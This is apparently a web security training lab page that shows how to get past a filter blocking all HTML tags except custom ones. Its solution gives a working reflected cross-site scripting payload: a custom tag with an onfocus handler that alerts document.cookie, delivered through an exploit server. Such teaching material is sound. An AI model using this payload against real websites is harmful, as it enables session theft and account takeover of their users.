Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Lab: Reflected XSS into HTML context with all tags blocked except custom ones

PRACTITIONER

This lab blocks all HTML tags except custom ones.

To solve the lab, perform a cross-site scripting attack that injects a custom tag and automatically alerts document.cookie.

ACCESS THE LAB

Solution

  1. Go to the exploit server and paste the following code, replacing YOUR-LAB-ID with your lab ID:

    <script> location = 'https://YOUR-LAB-ID.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x'; </script>
  2. Click "Store" and "Deliver exploit to victim".

This injection creates a custom tag with the ID x, which contains an onfocus event handler that triggers the alert function. The hash at the end of the URL focuses on this element as soon as the page is loaded, causing the alert payload to be called.

Community solutions

z3nsh3ll
Michael Sommer

Register for free to track your learning progress

The benefits of working through PortSwigger's Web Security Academy

  • Practise exploiting vulnerabilities on realistic targets.

  • Record your progression from Apprentice to Expert.

  • See where you rank in our Hall of Fame.

Already got an account? Login here

Try Burp Suite for Free

Find XSS vulnerabilities using Burp Suite

Try for free